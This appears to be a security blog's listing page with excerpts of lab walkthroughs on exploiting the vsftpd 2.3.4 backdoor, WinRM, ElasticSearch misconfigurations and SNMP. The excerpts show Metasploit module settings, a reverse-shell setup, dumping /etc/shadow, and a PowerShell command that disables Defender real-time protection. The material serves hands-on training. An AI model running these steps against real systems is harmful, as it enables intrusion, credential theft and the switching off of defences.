Identifying and Exploiting Vulnerable Services

Exploiting linux-based systems: Fire up metasploitanle 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]] We are having an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/ interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 6. Upgrading shell using command python -c 'import pty; pty.spawn("/bin/bash")' 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user’s passwords stored. 8. Save the credentials into a text file, make sure edit the unecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open kali for scanning and exploitation: Open up msfconsole for exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140 RHOSTS => 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator USERNAME => Administrator msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1 PASSWORD => P@ssword1 By default the command that will execute it is ipconfig /all Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let’s try that: It actually worked. Now let’s try for Remote shell: msf6 > use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128 Also turn off real time protection in your windwos server , because it will quarantine the execution. use this command on powershell into your DC Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th

Exploiting ElasticSearch Misconfigurations

Through the previous misconfigs, i should have full access to the elastic search database. Let’s see and exploit: Reconnaissance of the database: curl -X GET "http://192.168.83.140:9200" curl -X GET "http://192.168.83.140:9200/_cat/indices?v" _cat/indices: This is the API command to list all indices. ?v: This makes the output “verbose” (shows headers), so it’s easy to read. Why it’s dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs. EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND: "name" : "DC1" ...

November 24, 2025 · 7 min · 1297 words · 0x-s0M3n4th

SNMP Exploitation

Scanning for SNMP service using NMAP : nmap -sU -sT -p U:161,T:161 192.168.83.140 2. Open msfconsole and use the module named snmp_enum 3. Then run it: It has dumped all the network information like services running, open TCP,UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, processes Using tools other than metasploit: NMAP: nmap -sU -p 161 --script snmp-brute 192.168.83.140 2. snmpset : ...

November 24, 2025 · 4 min · 809 words · 0x-s0M3n4th